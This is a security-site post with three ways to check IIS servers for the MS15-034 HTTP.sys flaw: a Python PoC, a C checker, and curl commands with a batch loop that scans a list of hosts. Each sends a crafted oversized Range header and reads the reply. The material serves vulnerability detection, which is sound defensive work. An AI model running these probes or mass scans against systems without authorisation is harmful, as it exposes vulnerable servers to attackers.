
MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC | 安全盒子

九月 26, 2018 - 安全盒子

检测脚本一:

Python — beebeeto

http://www.beebeeto.com/pdb/poc-2015-0081/

#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import socket
import random
import urlparse
from baseframe import BaseFrame

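class MyPoc(BaseFrame):
    """Beebeeto PoC that checks a host for the MS15-034 (CVE-2015-1635) HTTP.sys patch state.

    The check is the published two-request probe: a plain request to confirm the
    server identifies itself as Microsoft IIS, then a request whose ``Range``
    upper bound is 2**64-1. The response to the second request decides the
    verdict (see :meth:`verify`).
    """

    poc_info = {
        # PoC metadata
        'poc': {
            'id': 'poc-2015-0081',
            'name': 'IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC',
            'author': 'user1018',
            'create_date': '2015-04-15',
        },
        # Protocol metadata
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer4_protocol': ['tcp'],
        },
        # Vulnerability metadata
        'vul': {
            'app_name': 'IIS',
            'vul_version': ['7.0'],
            'type': 'Code Execution',
            'tag': ['IIS7.0漏洞', 'HTTP.sys漏洞', 'CVE-2015-1635'],
            'desc': '''
影响范围:
Windows7
Windows8
Windows server 2008
Windows server 2012
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求
时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理
请求的方式,安装更新可以修复此漏洞。
''',
            'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',
                           'http://bobao.360.cn/news/detail/1435.html'],
        },
    }

    @staticmethod
    def _exchange(ip_addr, request, port=80, bufsize=1024):
        """Send one raw HTTP request over a fresh TCP connection and return the first response chunk.

        Args:
            ip_addr: IPv4 address (or resolvable name) to connect to.
            request: complete request text, including the terminating blank line.
            port: TCP port; the PoC metadata lists 80.
            bufsize: maximum number of bytes read from the response.

        Returns:
            Whatever ``recv`` delivered (at most ``bufsize`` bytes).

        The socket is always closed, including when connect/send/recv raise —
        the original opened two sockets and closed at most one of them.
        """
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            client_socket.connect((ip_addr, port))
            # sendall() retries partial writes; send() may silently truncate.
            client_socket.sendall(request)
            return client_socket.recv(bufsize)
        finally:
            client_socket.close()

    @classmethod
    def verify(cls, args):
        """Decide whether the target's HTTP.sys rejects an oversized Range header.

        Args:
            args: framework dict. Reads ``args['options']['target']`` (URL or
                bare host/IP) and the optional ``args['options']['verbose']``
                flag; writes ``args['success']`` and ``args['poc_ret']``.

        Returns:
            The same ``args`` dict, updated in place. ``success`` is set only
            when the response to the Range request contains
            "Requested Range Not Satisfiable"; an "invalid header name" reply
            is reported as patched, anything else as undetermined.
        """
        options = args['options']
        parsed = urlparse.urlparse(options['target'])
        # A bare host with no scheme parses with an empty netloc and lands in .path.
        if parsed.netloc == '':
            ip_addr = parsed.path
        else:
            ip_addr = socket.gethostbyname(parsed.netloc)

        # Upper bound of the Range header is 2**64-1 (a decimal value, despite
        # the original local being called hexAllFfff).
        max_uint64 = "18446744073709551615"
        fingerprint_req = "GET / HTTP/1.0\r\n\r\n"
        range_req = ("GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-"
                     + max_uint64 + "\r\n\r\n")

        if options.get('verbose'):
            print('[*] Target: ' + ip_addr)
            print('[*] Audit Started')

        # First request only fingerprints the server; skip non-IIS hosts.
        first_resp = cls._exchange(ip_addr, fingerprint_req)
        if "Microsoft" not in first_resp:
            print("[*] Not IIS")
            return args

        second_resp = cls._exchange(ip_addr, range_req)
        if "Requested Range Not Satisfiable" in second_resp:
            print("[+] Looks Vulnerability!")
            args['success'] = True
            args['poc_ret']['vulnerability'] = ip_addr
        elif " The request has an invalid header name" in second_resp:
            args['poc_ret']['error'] = "[*] Looks Patched"
        else:
            args['poc_ret']['error'] = "[*] Unexpected response, cannot discern patch status"
        return args

    # The framework's exploit entry point is the same check; this PoC only detects.
    exploit = verify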
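if __name__ == '__main__':
    from pprint import pprint

    # Run the PoC through the framework's run() entry point and dump the result dict.
    mp = MyPoc()
    pprint(mp.run())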

检测脚本二:

http://www.exploit-db.com/exploits/36773/

/*
UNTESTED – MS15-034 Checker
THE BUG:
8a8b2112 56 push esi
8a8b2113 6a00 push 0
8a8b2115 2bc7 sub eax,edi
8a8b2117 6a01 push 1
8a8b2119 1bca sbb ecx,edx
8a8b211b 51 push ecx
8a8b211c 50 push eax
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
BY: john.b.hale@gmai.com
Twitter: @rhcp011235
*/
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <arpa/inet.h>
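/*
 * Open a TCP connection to port 80 on the numeric IPv4 address `ip`.
 *
 * Returns the connected socket descriptor, or -1 on failure (socket
 * creation, address parsing, or connect). The original returned 1 on
 * error, which is a valid descriptor (stdout), and leaked the socket on
 * the two later error paths; both are fixed here.
 */
int connect_to_server(char *ip)
{
    int sockfd;
    struct sockaddr_in serv_addr;

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        printf("\n Error : Could not create socket \n");
        return -1;
    }
    /* Zero the whole struct; the original passed the character '0'
     * (0x30), which is not a zero byte. */
    memset(&serv_addr, 0, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(80);
    /* inet_pton accepts numeric addresses only; hostnames fail here. */
    if (inet_pton(AF_INET, ip, &serv_addr.sin_addr) <= 0)
    {
        printf("\n inet_pton error occured\n");
        close(sockfd);
        return -1;
    }
    if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
    {
        printf("\n Error : Connect Failed \n");
        close(sockfd);
        return -1;
    }
    return sockfd;
}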

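/*
 * Connect to `ip`, send `request`, and read the first response chunk into
 * `buf` (capacity `len`). On success `buf` is NUL-terminated so it can be
 * searched with strstr(); the original passed an unterminated buffer.
 *
 * Returns the number of bytes read, or -1 if connecting, writing or
 * reading failed. The socket is closed in every case.
 */
static ssize_t probe(char *ip, const char *request, char *buf, size_t len)
{
    int sockfd = connect_to_server(ip);
    ssize_t n;

    if (sockfd < 0)
        return -1;
    if (write(sockfd, request, strlen(request)) < 0)
    {
        close(sockfd);
        return -1;
    }
    n = read(sockfd, buf, len - 1);
    close(sockfd);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/*
 * MS15-034 checker: fingerprint the server, then send the Range request
 * and classify the response. Exit status is 1 for usage errors, I/O
 * failures, non-IIS hosts and a "Looks VULN" verdict; 0 otherwise
 * (unchanged from the original's exit codes).
 */
int main(int argc, char *argv[])
{
    char recvBuff[1024];
    /* Plain HTTP/1.0 request, used only to check the Server header. */
    char request[] = "GET / HTTP/1.0\r\n\r\n";
    /* Range upper bound of 2^64-1: the overflow path flagged in the file
     * header's disassembly (RtlULongLongAdd call). */
    char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";

    if (argc != 2)
    {
        printf("\n Usage: %s <ip of server> \n", argv[0]);
        return 1;
    }
    printf("[*] Audit Started\n");

    if (probe(argv[1], request, recvBuff, sizeof(recvBuff)) < 0)
    {
        printf("[*] Could not talk to server\n");
        return 1;
    }
    if (!strstr(recvBuff, "Microsoft"))
    {
        printf("[*] NOT IIS\n");
        return 1;
    }

    if (probe(argv[1], request1, recvBuff, sizeof(recvBuff)) < 0)
    {
        printf("[*] Could not talk to server\n");
        return 1;
    }
    if (strstr(recvBuff, "Requested Range Not Satisfiable"))
    {
        printf("[!!] Looks VULN\n");
        return 1;
    }
    else if (strstr(recvBuff, "The request has an invalid header name"))
    {
        printf("[*] Looks Patched\n");
    }
    else
    {
        printf("[*] Unexpected response, cannot discern patch status\n");
    }
    return 0;
}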

检测方法三:

最简单的检测方法:

# Single-request check: print status line and headers (--include) for the
# oversized Range request; the page's verdict rule is the "range is not
# satisfiable" text in the reply.
curl --include --header "Host: irrelevant" --header "Range: bytes=0-18446744073709551615" http://xxx.com/

响应中包含 "The requested range is not satisfiable" 就表示存在漏洞

# Same request, reduced to a yes/no: grep echoes the matching line only when
# the response carries the "range is not satisfiable" text.
curl --header "Host: irrelevant" --header "Range: bytes=0-18446744073709551615" http://xxx.com/ | grep "The requested range is not satisfiable"

批量代码:

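setlocal enabledelayedexpansion
REM Run the single-request check from above against every host listed in
REM iisf.txt (one per line). The rendered page lost the "-i" and "-H" flag
REM dashes and replaced the quotes with typographic ones; both are restored.
REM Output appears only for hosts whose reply contains the "range is not
REM satisfiable" text.
for /f %%i in (iisf.txt) do (
    curl -i %%i -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615" | find "The requested range is not satisfiable"
)
pause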



